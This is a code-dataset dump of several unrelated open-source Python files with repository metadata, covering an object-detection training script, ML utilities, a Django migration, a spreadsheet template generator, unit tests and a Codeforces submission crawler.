form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
login_user(user,form.remember_me.data)
return redirect(url_for('.index'))
return render_template('login.html',form=form)
@front.route('/register',methods=['GET','POST'])
def register():
form = RegisterForm()
if form.validate_on_submit():
form.create_user()
flash('register success!please login','success')
return redirect(url_for('.login'))
return render_template('register.html',form=form)
| 31.833333
| 66
| 0.710995
| 0
| 0
| 0
| 0
| 725
| 0.759162
| 0
| 0
| 135
| 0.141361
|
af456070653a62afea1b52eac295ba59531bc4a5
| 6,151
|
py
|
Python
|
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
import argparse
import numpy as np
import os
from os import path
import tensorflow as tf
from tensorflow.keras.callbacks import ModelCheckpoint
from models import RefineDetVGG16
from utils import read_jpeg_image, resize_image_and_boxes, absolute2relative
from saffran.saffran_data_loader import load_saffran_dataset
from saffran.augmentations import Augmentation
from saffran.config import IMAGE_SIZE, BATCH_SIZE, SHUFFLE_BUFFER, NUM_CLASS, LR_SCHEDULE, MOMENTUM, NUM_EPOCHS, STEPS_PER_EPOCH
parser = argparse.ArgumentParser()
parser.add_argument('--saffran_root', type=str, default='./data/Saffron_Dataset/Labeled/',
help='Path to the VOCdevkit directory.')
parser.add_argument('--checkpoint', type=str, default=None,
help='Path to the weights file, in the case of resuming training.')
parser.add_argument('--initial_epoch', type=int, default=0,
help='Starting epoch. Give a value bigger than zero to resume training.')
parser.add_argument('--batch_size', type=int, default=None,
help='Useful for quick tests. If not provided, the value in the config file is used instead.')
args = parser.parse_args()
BATCH_SIZE = args.batch_size or BATCH_SIZE
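# Build a tf.data pipeline of (image, ragged bounding-box) batches from image paths and box lists.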
def build_dataset(img_paths, bboxes, repeat=False, shuffle=False,
drop_remainder=False, augmentation_fn=None):
row_lengths = [len(img_bboxes) for img_bboxes in bboxes]
bboxes_concat = np.concatenate(bboxes, axis=0)
bboxes = tf.RaggedTensor.from_row_lengths(values=bboxes_concat,
row_lengths=row_lengths)
dataset = tf.data.Dataset.from_tensor_slices((img_paths, bboxes))
if repeat:
dataset = dataset.repeat()
if shuffle:
dataset = dataset.shuffle(len(img_paths),
reshuffle_each_iteration=True)
dataset = dataset.map(lambda img_path, boxes:
(read_jpeg_image(img_path), boxes))
if augmentation_fn:
dataset = dataset.map(augmentation_fn)
dataset = dataset.map(lambda image, boxes:
resize_image_and_boxes(image, boxes, IMAGE_SIZE))
dataset = dataset.map(lambda image, boxes:
(image, absolute2relative(boxes, tf.shape(image))))
# This hack is to allow batching into ragged tensors
dataset = dataset.map(lambda image, boxes:
(image, tf.expand_dims(boxes, 0)))
dataset = dataset.map(lambda image, boxes:
(image, tf.RaggedTensor.from_tensor(boxes)))
dataset = dataset.batch(BATCH_SIZE, drop_remainder=drop_remainder)
dataset = dataset.map(lambda image, boxes:
(image, boxes.merge_dims(1, 2)))
return dataset
train_img_paths, train_bboxes = load_saffran_dataset(dataroot=args.saffran_root)
print('INFO: Loaded %d training samples' % len(train_img_paths))
# Classes start at 0
for i in train_bboxes:
    i[:, -1] = i[:, -1] - 1
train_data = build_dataset(train_img_paths, train_bboxes,
repeat=True, shuffle=True, drop_remainder=True,
augmentation_fn=Augmentation())
print(train_data)
print('INFO: Instantiating model...')
model = RefineDetVGG16(num_classes=NUM_CLASS,aspect_ratios=[1.0])
model.build(input_shape=(BATCH_SIZE, IMAGE_SIZE[0], IMAGE_SIZE[1], 3))
if args.checkpoint:
model.load_weights(args.checkpoint)
else:
model.base.load_weights(
path.join('weights', 'VGG_ILSVRC_16_layers_fc_reduced.h5'), by_name=True)
lr_scheduler = tf.keras.optimizers.schedules.PiecewiseConstantDecay(*LR_SCHEDULE)
optimizer = tf.keras.optimizers.SGD(lr_scheduler, momentum=MOMENTUM)
optimizer.iterations = tf.Variable(STEPS_PER_EPOCH * args.initial_epoch)
print('Training at learning rate =', optimizer._decayed_lr(tf.float32))
model.compile(optimizer=optimizer)
os.makedirs('weights', exist_ok=True)
callbacks = [
ModelCheckpoint(path.join('weights', 'refinedet_vgg16_{epoch:0d}.h5'),
monitor='total_loss')
]
history = model.fit(train_data, epochs=NUM_EPOCHS, steps_per_epoch=STEPS_PER_EPOCH,
initial_epoch=args.initial_epoch, callbacks=callbacks)
import cv2
import matplotlib.pyplot as plt
# NMS and minmax2xywh are used in the test loop below; they are assumed to be
# provided by this repository's utils module alongside the other helpers.
from utils import NMS, minmax2xywh
def sind(x):
return np.sin(x / 180*np.pi)
def cosd(x):
return np.cos(x / 180*np.pi)
def draw_line_segment(image, center, angle, color, length=40, thickness=3):
x1 = center[0] - cosd(angle) * length / 2
x2 = center[0] + cosd(angle) * length / 2
y1 = center[1] - sind(angle) * length / 2
y2 = center[1] + sind(angle) * length / 2
cv2.line(image, (int(x1 + .5), int(y1 + .5)), (int(x2 + .5), int(y2 + .5)), color, thickness)
def draw_output_lines(centers_box, test, print_conf=False, resize=False):
out = []
if resize:
test = cv2.resize(test,resize)
SIZE2,SIZE1 = resize
else:
SIZE1,SIZE2 = 640,640
if print_conf:
print(centers_box[:,-1])
for i in centers_box:
cx = i[0] * SIZE2
cy = i[1] * SIZE1
label = i[-2]
confidence = i[-1]
angle = np.arccos(label/NUM_CLASS)*(180/np.pi)
draw_line_segment(test,(cx,cy),angle,(255,255,0))
out.append('{} {} {} {}'.format(str(cx),str(cy),str(angle),str(confidence)))
plt.figure(figsize=(10,10))
plt.imshow(test)
plt.show()
return out
SIZE=640
test_dir = 'data/Saffron_Dataset/Test/' # CHANGE HERE TO CHANGE TEST DIRECTORY
test_images = os.listdir(test_dir)
for img_name in test_images:
if img_name.endswith('.txt'):
continue
img = cv2.imread(test_dir+img_name)
img = img.astype(np.float64)
org_shape = img.shape
img = cv2.resize(img,(SIZE,SIZE))
img = np.expand_dims(img,0)
out_boxes = model(img,decode=True)
nms_box = NMS(out_boxes[0],top_k=500,nms_threshold=0.1)
centers_box = minmax2xywh(nms_box)
    out = draw_output_lines(centers_box, img[0].astype(np.uint8), False, resize=org_shape[:2][::-1])
out = '\n'.join(out)
with open(test_dir + img_name.split('.')[0]+'.txt','w') as f:
f.write(out)
| 35.761628
| 128
| 0.667859
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 718
| 0.116729
|
af4aa6d6dc3668051cf943238abd945caf290ab8
| 610
|
py
|
Python
|
Code/utils/Load_model.py
|
rezacsedu/Detection-of-Hate-Speech-in-Multimodal-Memes
|
9c66be09d4d12c0f9630e4fe4060dd1aa7c5fd0b
|
[
"CC0-1.0"
] | 8
|
2021-03-14T00:37:44.000Z
|
2022-03-06T07:41:27.000Z
|
Code/utils/Load_model.py
|
rezacsedu/Detection-of-Hate-Speech-in-Multimodal-Memes
|
9c66be09d4d12c0f9630e4fe4060dd1aa7c5fd0b
|
[
"CC0-1.0"
] | 1
|
2021-03-30T14:29:22.000Z
|
2022-01-31T18:21:25.000Z
|
Code/utils/Load_model.py
|
rezacsedu/Detection-of-Hate-Speech-in-Multimodal-Memes
|
9c66be09d4d12c0f9630e4fe4060dd1aa7c5fd0b
|
[
"CC0-1.0"
] | 2
|
2021-03-01T02:51:53.000Z
|
2021-08-10T09:18:26.000Z
|
import torch
######### Load saved model from checkpoint #########
def load(modelpath, model, optimizer, lr_scheduler):
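    # Restore model, optimizer and LR-scheduler state plus the stored training history lists.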
checkpoint = torch.load(modelpath)
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
train_loss = checkpoint['Training_Loss_List']
v_loss = checkpoint['Validation_Loss_List']
v_acc = checkpoint['Validation_Accuracy_List']
epoch = checkpoint['Epoch']
lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
return model, optimizer, lr_scheduler, train_loss, v_loss, v_acc, epoch
| 35.882353
| 75
| 0.736066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 182
| 0.298361
|
af4ba5a904905887481da5fbd8875608d26d4c5d
| 7,649
|
py
|
Python
|
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | null | null | null |
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | 3
|
2021-02-09T14:57:00.000Z
|
2021-09-27T23:23:45.000Z
|
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | 1
|
2022-02-23T14:21:17.000Z
|
2022-02-23T14:21:17.000Z
|
import argparse
import gspread
import json
import lattice
import requests
import string
import sys
from collections import OrderedDict
from gspread_formatting import *
from oauth2client.service_account import ServiceAccountCredentials
from urllib.parse import urljoin
def getArgs():
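    # Command-line options: object type, server mode, Google credentials file and target sheet key.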
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('-t','--type',
help="the object type to return a template for")
parser.add_argument('-m','--mode',
help="the server to look-up schema, if not local")
parser.add_argument('-c','--creds',
help="the location of google drive client_secret.json file")
parser.add_argument('-s','--sheet',
help="the key for the google sheet")
args = parser.parse_args()
return args
args = getArgs()
if not args.type:
sys.exit('ERROR: --type is required')
if not args.creds:
sys.exit('ERROR: --creds is required')
if not args.sheet:
sys.exit('ERROR: --sheet is required')
if not args.mode:
sys.exit('ERROR: --mode is required')
schema_name = args.type
# follow instructions here to enable API & generate credentials
# https://www.twilio.com/blog/2017/02/an-easy-way-to-read-and-write-to-a-google-spreadsheet-in-python.html
creds = ServiceAccountCredentials.from_json_keyfile_name(args.creds, 'https://www.googleapis.com/auth/drive')
client = gspread.authorize(creds)
sheet = client.open_by_key(args.sheet)
for tab in sheet.worksheets():
if tab.title == schema_name:
sheet.del_worksheet(tab)
tab = sheet.add_worksheet(title=schema_name,rows='100',cols='52')
abcs = string.ascii_uppercase
cell_grid = list(abcs) + ['A' + i for i in abcs]
connection = lattice.Connection(args.mode)
server = connection.server
# grab the OntologyTerm term_name & term_id schemas to put in places that linkTo OntologyTerm
ont_schema_url = urljoin(server, 'profiles/ontology_term/?format=json')
ont_schema = requests.get(ont_schema_url).json()
term_id_props = ont_schema['properties']['term_id']
term_name_props = ont_schema['properties']['term_name']
# grab all of the submittable properties
props = {}
schema_url = urljoin(server, 'profiles/' + schema_name + '/?format=json')
schema = requests.get(schema_url).json()
for p in schema['properties'].keys():
props[p] = schema['properties'][p]
ordered_props = OrderedDict(props)
# grab all of the properties of subobjects
subprops = {}
non_submit = [] # collect the base property so we can grey it out in favor of the subproperties
for p in props.keys():
if props[p]['type'] == 'object' or \
(props[p]['type'] == 'array' and props[p]['items']['type'] == 'object'):
subprops[p] = props[p]
ordered_props.pop(p)
non_submit.append(p)
if props[p]['type'] == 'array':
for sp in props[p]['items']['properties'].keys():
if props[p]['items']['properties'][sp]['type'] == 'object' or \
(props[p]['items']['properties'][sp]['type'] == 'array' and props[p]['items']['properties'][sp]['items']['type'] == 'object'):
subprops[p + '.' + sp] = props[p]['items']['properties'][sp]
non_submit.append(p + '.' + sp)
if props[p]['items']['properties'][sp]['type'] == 'array':
for ssp in props[p]['items']['properties'][sp]['items']['properties'].keys():
subprops[p + '.' + sp + '.' + ssp] = props[p]['items']['properties'][sp]['items']['properties'][ssp]
else:
                        for ssp in props[p]['items']['properties'][sp]['properties'].keys():
subprops[p + '.' + sp + '.' + ssp] = props[p]['items']['properties'][sp]['properties'][ssp]
else:
subprops[p + '.' + sp] = props[p]['items']['properties'][sp]
else:
my_props = props[p]['properties']
for sp in my_props.keys():
subprops[p + '.' + sp] = my_props[sp]
ordered_props.update(subprops)
remove_props = []
ont_props = []
for p in ordered_props.keys():
if str(ordered_props[p].get('comment')).startswith('Do not submit') \
or ordered_props[p].get('notSubmittable') == True:
remove_props.append(p)
if p in non_submit:
non_submit.remove(p)
elif ordered_props[p].get('linkTo') == 'OntologyTerm':
remove_props.append(p)
ont_props.append(p)
for p in remove_props:
del ordered_props[p]
for p in ont_props:
ordered_props[p + '.term_id'] = term_id_props
ordered_props[p + '.term_name'] = term_name_props
non_submit_col = []
for p in non_submit:
non_submit_col.append(cell_grid[list(ordered_props.keys()).index(p) + 1])
# collect required fields & move fields to the front
req_props = []
if schema.get('required'):
req_count = 0
req_props = schema['required']
for i in req_props:
if i in ordered_props:
ordered_props.move_to_end(i, False)
req_count += 1
else:
ordered_props.move_to_end(i + '.term_id', False)
ordered_props.move_to_end(i + '.term_name', False)
req_count += 2
# get the required field columns so we can color them later
req_columns = []
if req_props:
if 'aliases' in ordered_props.keys():
ordered_props.move_to_end('aliases', False)
req_start_col = 'C'
req_stop_col = cell_grid[req_count + 1]
else:
req_start_col = 'B'
req_stop_col = cell_grid[req_count]
req_columns = ':'.join([req_start_col, req_stop_col])
# list the attributes we want to know about each property
descriptor_list = [
'title',
'description',
'comment',
'type',
'linkTo',
'enum'
]
uber_list = []
# gather the top row list of schema_version followed by the property names
schema_version = schema['properties']['schema_version']['default']
prop_list = ['schema_version=' + schema_version]
for p in ordered_props.keys():
prop_list.append(p)
uber_list.append(prop_list)
# gather the attributes of each property
for descriptor in descriptor_list:
this_list = ['#' + descriptor]
for p in ordered_props.keys():
if ordered_props[p]['type'] == 'array' and descriptor in ['type','enum','linkTo']:
if ordered_props[p]['items'].get(descriptor):
this_list.append('array of ' + str(ordered_props[p]['items'].get(descriptor,'')))
else:
this_list.append('')
else:
this_list.append(str(ordered_props[p].get(descriptor,'')))
uber_list.append(this_list)
# write the whole thing to the google sheet
tab.update('A1',uber_list)
# bold the first column
tab.format('A:A', {'textFormat': {'bold': True}})
# set the whole sheet to clip text
tab.format('A1:AZ100',{'wrapStrategy': 'CLIP'})
# set cell validation in the first input row for all boolean fields or fields with an enum list
count = 0
for p in ordered_props.keys():
count += 1
if ordered_props[p].get('enum') or ordered_props[p].get('type') == 'boolean':
col = cell_grid[count]
cell_to_format = col + str(len(descriptor_list) + 2) + ':' + col + '100'
validation_rule = DataValidationRule(BooleanCondition('ONE_OF_LIST',
ordered_props[p].get('enum', ['TRUE','FALSE'])),
showCustomUi=True)
set_data_validation_for_cell_range(tab, cell_to_format, validation_rule)
# aliases should be the first property listed, so freeze that column and the descriptor column
if ordered_props.get('aliases'):
set_frozen(tab, rows=len(descriptor_list) + 1, cols=2)
else:  # if no aliases property, then just freeze the descriptor column
set_frozen(tab, rows=len(descriptor_list) + 1, cols=1)
# shade all of the columns with required properties
if req_columns:
green = color(0.58, 0.77, 0.49)
format_cell_range(tab, req_columns, cellFormat(backgroundColor=green))
# for the properties with embedded objects, shade the non-submittable property
for column in non_submit_col:
grey = color(0.85, 0.85, 0.85)
format_cell_range(tab, column, cellFormat(backgroundColor=grey))
| 35.576744
| 130
| 0.697085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,585
| 0.337953
|
af4fa2ce445c7c2f288125fe751a69825469c270
| 8,191
|
py
|
Python
|
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Forte Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle as pkl
import unittest
from itertools import product
from ddt import ddt, data, unpack
from asyml_utilities.special_tokens import SpecialTokens
from forte.common import InvalidOperationException
from forte.data import dataset_path_iterator
from forte.data.vocabulary import Vocabulary, FrequencyVocabFilter
@ddt
class VocabularyTest(unittest.TestCase):
def setUp(self):
self.data_path = os.path.abspath(
os.path.join(
os.path.dirname(__file__),
"../../../",
"data_samples",
"random_texts",
)
)
def argmax(self, one_hot):
idx = -1
for i, flag in enumerate(one_hot):
if flag:
self.assertTrue(idx == -1)
idx = i
return idx
def test_vocabulary(self):
methods = ["indexing", "one-hot"]
flags = [True, False]
for method, need_pad, use_unk in product(methods, flags, flags):
# As stated here: https://github.com/python/typing/issues/511
# If we use the generic type here we cannot pickle the class
# in python 3.6 or earlier (the issue is fixed in 3.7).
# So here we do not use the type annotation for testing.
vocab = Vocabulary(method=method, use_pad=need_pad, use_unk=use_unk)
# Check vocabulary add_element, element2repr and id2element
elements = [
"EU",
"rejects",
"German",
"call",
"to",
"boycott",
"British",
"lamb",
".",
]
for ele in elements:
vocab.add_element(ele)
save_len = len(vocab)
for ele in elements:
vocab.add_element(ele)
self.assertEqual(save_len, len(vocab))
representation = [vocab.element2repr(ele) for ele in elements]
self.assertTrue(len(representation) > 0)
if method == "indexing":
self.assertTrue(isinstance(representation[0], int))
else:
self.assertTrue(isinstance(representation[0], list))
recovered_elements = []
for rep in representation:
if method == "indexing":
idx = rep
else:
idx = self.argmax(rep)
recovered_elements.append(vocab.id2element(idx))
self.assertListEqual(elements, recovered_elements)
# Check __len__, items.
self.assertEqual(
len(set(elements)) + int(use_unk) + int(need_pad), len(vocab)
)
saved_len = len(vocab)
# Check has_element
for ele in elements:
self.assertTrue(vocab.has_element(ele))
for ele in range(10):
self.assertFalse(vocab.has_element(ele))
# check PAD_ELEMENT
if need_pad:
if method == "indexing":
expected_pad_repr = 0
else:
expected_pad_repr = [0] * (len(vocab) - 1)
self.assertEqual(
expected_pad_repr, vocab.element2repr(SpecialTokens.PAD)
)
# Check UNK_ELEMENT
if use_unk:
if method == "indexing":
expected_unk_repr = 0 + int(need_pad)
else:
expected_unk_repr = [0] * (len(vocab) - int(need_pad))
expected_unk_repr[0] = 1
self.assertEqual(
expected_unk_repr, vocab.element2repr(SpecialTokens.UNK)
)
self.assertEqual(
expected_unk_repr, vocab.element2repr("random_element")
)
self.assertEqual(saved_len, len(vocab))
# Check state
new_vocab = pkl.loads(pkl.dumps(vocab))
self.assertEqual(vocab.method, new_vocab.method)
self.assertEqual(vocab.use_pad, new_vocab.use_pad)
self.assertEqual(vocab.use_unk, new_vocab.use_unk)
self.assertEqual(vocab._element2id, new_vocab._element2id)
self.assertEqual(vocab._id2element, new_vocab._id2element)
self.assertEqual(vocab.next_id, new_vocab.next_id)
# These cases correspond to different combinations of PAD and UNK, and
# whether we have additional specials.
@data(
(True, False, ["cls", "blah"]),
(False, False, ["cls", "blah"]),
(False, True, ["cls", "blah"]),
(False, False, ["cls", "blah"]),
(True, False, None),
(False, False, None),
(False, True, None),
(False, False, None),
)
@unpack
def test_freq_filtering(self, need_pad, use_unk, special_tokens):
base_vocab = Vocabulary(
use_pad=need_pad, use_unk=use_unk, special_tokens=special_tokens
)
for p in dataset_path_iterator(self.data_path, ".txt"):
with open(p) as f:
for line in f:
for w in line.strip().split():
base_vocab.add_element(w)
vocab_filter = FrequencyVocabFilter(
base_vocab, min_frequency=2, max_frequency=4
)
filtered = base_vocab.filter(vocab_filter)
for e, eid in base_vocab.vocab_items():
if base_vocab.is_special_token(eid):
# Check that the filtered vocab have all special elements.
self.assertTrue(filtered.has_element(e))
else:
base_count = base_vocab.get_count(e)
if 2 <= base_count <= 4:
self.assertTrue(filtered.has_element(e))
self.assertEqual(base_count, filtered.get_count(e))
else:
self.assertFalse(filtered.has_element(e))
self.assertEqual(
len(base_vocab._element2id), len(base_vocab._id2element)
)
@data(
("indexing", 0, 2),
("one-hot", [1, 0, 0, 0, 0], [0, 0, 1, 0, 0]),
)
@unpack
def test_custom_vocab(self, method, expected_pad_value, expected_unk_value):
vocab = Vocabulary(method=method, use_pad=False, use_unk=False)
predefined = {
"[PAD]": -1,
"[CLS]": -1,
"[UNK]": -1,
"a": 2,
"b": 3,
"c": 4,
}
for e, count in predefined.items():
if count == -1:
vocab.add_special_element(e)
else:
vocab.add_element(e, count=count)
# Set the first element [PAD] to be the padding value.
vocab.mark_special_element(0, "PAD")
# Set the third element [UNK] to be the unknown value.
vocab.mark_special_element(2, "UNK")
# Check that padding values are the same as the expected representation.
self.assertEqual(vocab.get_pad_value(), expected_pad_value)
self.assertEqual(vocab.element2repr("[PAD]"), expected_pad_value)
# Check that unknown words are mapped to expected representation.
self.assertEqual(
vocab.element2repr("something else"), expected_unk_value
)
for i in [0, 1, 2]:
self.assertTrue(vocab.is_special_token(i))
with self.assertRaises(InvalidOperationException):
vocab.get_count(i)
if __name__ == "__main__":
unittest.main()
| 35.613043
| 80
| 0.561104
| 7,197
| 0.878647
| 0
| 0
| 7,202
| 0.879258
| 0
| 0
| 1,700
| 0.207545
|
af5046173b41ba95d5ae8b44b58b6a5a51e8848f
| 1,979
|
py
|
Python
|
beerhunter/hops/migrations/0001_initial.py
|
zhukovvlad/beerhunt-project
|
e841f4946c08275e9d189605ffe9026d6657d63f
|
[
"MIT"
] | null | null | null |
beerhunter/hops/migrations/0001_initial.py
|
zhukovvlad/beerhunt-project
|
e841f4946c08275e9d189605ffe9026d6657d63f
|
[
"MIT"
] | null | null | null |
beerhunter/hops/migrations/0001_initial.py
|
zhukovvlad/beerhunt-project
|
e841f4946c08275e9d189605ffe9026d6657d63f
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.9 on 2020-08-24 17:29
import autoslug.fields
from django.db import migrations, models
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AromaProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
],
options={
'ordering': ('title',),
},
),
migrations.CreateModel(
name='Hop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='Title of Hop')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='title', unique=True, verbose_name='Hop Slug')),
('description', models.TextField(blank=True, verbose_name='Description')),
('alpha_min', models.FloatField(blank=True, null=True)),
('alpha_max', models.FloatField(blank=True, null=True)),
('beta_min', models.FloatField(blank=True, null=True)),
('beta_max', models.FloatField(blank=True, null=True)),
('oil_min', models.FloatField(blank=True, null=True)),
('oil_max', models.FloatField(blank=True, null=True)),
],
options={
'ordering': ('title',),
},
),
]
| 41.229167
| 147
| 0.587671
| 1,808
| 0.913593
| 0
| 0
| 0
| 0
| 0
| 0
| 291
| 0.147044
|
af52d7912236214a17650c5aa0f534f092aa2d20
| 624
|
py
|
Python
|
iot-sandbox/sandbox/sandbox/routing.py
|
d-hrytsenko/virgil-iotkit
|
5e7baa122cd0adeb96bcc45afac7d091e8fd0432
|
[
"BSD-3-Clause"
] | null | null | null |
iot-sandbox/sandbox/sandbox/routing.py
|
d-hrytsenko/virgil-iotkit
|
5e7baa122cd0adeb96bcc45afac7d091e8fd0432
|
[
"BSD-3-Clause"
] | null | null | null |
iot-sandbox/sandbox/sandbox/routing.py
|
d-hrytsenko/virgil-iotkit
|
5e7baa122cd0adeb96bcc45afac7d091e8fd0432
|
[
"BSD-3-Clause"
] | null | null | null |
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from django.urls import path
from sandbox.apps.devices.consumers import FactoryDevicesConsumer, UserDevicesConsumer
from sandbox.libs.logs.consumers import SandboxLogsConsumer
application = ProtocolTypeRouter({
# (http->django views is added by default)
'websocket': AuthMiddlewareStack(
URLRouter([
path('ws/devices/factory', FactoryDevicesConsumer),
path('ws/devices/user', UserDevicesConsumer),
path('ws/logs/sandbox', SandboxLogsConsumer),
])
),
})
| 34.666667
| 86
| 0.735577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 107
| 0.171474
|
af54d8608e299a17c445fa8a61556df44ff6ac62
| 3,402
|
py
|
Python
|
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
import sys
import json
from typing import Optional
from datetime import datetime, timezone
from .submissions_loader import Submission, SubmissionLoader, SubmissionStatus
class CodeforcesSubmissionLoader(SubmissionLoader):
def _normalize_status(self, external_status: str) -> SubmissionStatus:
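        # Map a raw Codeforces verdict string onto the crawler's common SubmissionStatus values.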
patterns: list[tuple[SubmissionStatus, str]] = [
(SubmissionStatus.CompileError, 'COMPILATION_ERROR'),
(SubmissionStatus.WrongAnswer, 'WRONG_ANSWER'),
(SubmissionStatus.WrongAnswer, 'CHALLENGED'),
(SubmissionStatus.TimeLimitExceeded, 'TIME_LIMIT_EXCEEDED'),
(SubmissionStatus.MemoryLimitExceeded, 'MEMORY_LIMIT_EXCEEDED'),
(SubmissionStatus.Accepted, 'OK'),
(SubmissionStatus.RuntimeError, 'RUNTIME_ERROR'),
(SubmissionStatus.PresentationError, 'PRESENTATION_ERROR'),
(SubmissionStatus.WaitingForJudging, 'TESTING'),
(SubmissionStatus.TimeLimitExceeded, 'IDLENESS_LIMIT_EXCEEDED'),
(SubmissionStatus.WrongAnswer, 'PARTIAL'),
(SubmissionStatus.InternalError, 'CRASHED'),
]
for pattern in patterns:
if pattern[1] == external_status:
return pattern[0]
print('Unknown Status(Codeforces):', external_status, file=sys.stderr)
return SubmissionStatus.Unknown
def _get(self, since: Optional[datetime] = None) -> list[Submission]:
url = 'http://codeforces.com/api/problemset.recentStatus'
result: list[Submission] = []
submissions_json = self._request(f'{url}?count=1000')
submissions = json.loads(submissions_json)['result']
        # Iterate the submissions oldest-first
for submission in reversed(submissions):
user_id = submission['author']['members'][0]['handle']
contest_id = str(submission['problem']['contestId'])
task_id = submission['problem']['index']
submission_id = int(submission['id'])
timestamp = int(submission['creationTimeSeconds'])
status = submission['verdict'] if 'verdict' in submission else ''
score = 1 if self._normalize_status(
status) == SubmissionStatus.Accepted else 0
language = submission['programmingLanguage']
memory = submission['memoryConsumedBytes']
exec_time = submission['timeConsumedMillis']
code_size = 0
data = Submission(
id=submission_id,
external_user_id=user_id,
external_contest_id=f'codeforces:{contest_id}',
score=score,
status=self._normalize_status(status),
language=language,
external_task_id=f'codeforces:{contest_id}:{task_id}',
external_submission_id=f'codeforces:{contest_id}:{submission_id}',
submitted_at=datetime.fromtimestamp(
timestamp, tz=timezone.utc),
memory=memory,
exec_time=exec_time,
code_size=code_size
)
if data.status == SubmissionStatus.WaitingForJudging:
break
if self.latest_id and data.id <= self.latest_id:
continue
if since is not None and data.submitted_at < since:
continue
result.append(data)
return result
| 40.023529
| 82
| 0.620223
| 3,235
| 0.949237
| 0
| 0
| 0
| 0
| 0
| 0
| 570
| 0.167254
|
af55a79f421926129b24a6d21a7c6d4dc299051b
| 1,477
|
py
|
Python
|
chainer/distributions/one_hot_categorical.py
|
lehy/chainer
|
007f86fdc68d9963a01f9d9230e004071a1fcfb2
|
[
"MIT"
] | null | null | null |
chainer/distributions/one_hot_categorical.py
|
lehy/chainer
|
007f86fdc68d9963a01f9d9230e004071a1fcfb2
|
[
"MIT"
] | null | null | null |
chainer/distributions/one_hot_categorical.py
|
lehy/chainer
|
007f86fdc68d9963a01f9d9230e004071a1fcfb2
|
[
"MIT"
] | null | null | null |
import chainer
from chainer.backends import cuda
from chainer import distribution
from chainer.functions.math import exponential
import chainer.functions.math.sum as sum_mod
class OneHotCategorical(distribution.Distribution):
"""OneHotCategorical Distribution.
Args:
p(:class:`~chainer.Variable` or :class:`numpy.ndarray` or \
:class:`cupy.ndarray`): Parameter of distribution.
"""
def __init__(self, p):
super(OneHotCategorical, self).__init__()
self.__p = chainer.as_variable(p)
@property
def p(self):
return self.__p
@property
def batch_shape(self):
return self.p.shape[:-1]
@property
def event_shape(self):
return self.p.shape[-1:]
@property
def _is_gpu(self):
return isinstance(self.p.data, cuda.ndarray)
def log_prob(self, x):
return sum_mod.sum(exponential.log(self.p) * x, axis=-1)
@property
def mean(self):
return self.p
def sample_n(self, n):
xp = cuda.get_array_module(self.p)
obo_p = self.p.data.reshape((-1,) + self.event_shape)
eye = xp.eye(self.event_shape[0])
eps = [xp.random.choice(
one_p.shape[0], size=(n,), p=one_p) for one_p in obo_p]
eps = xp.stack(eps).T.reshape((n,)+self.batch_shape)
eps = eye[eps]
noise = chainer.Variable(eps)
return noise
@property
def variance(self):
return self.p * (1. - self.p)
| 25.465517
| 67
| 0.625592
| 1,300
| 0.880162
| 0
| 0
| 395
| 0.267434
| 0
| 0
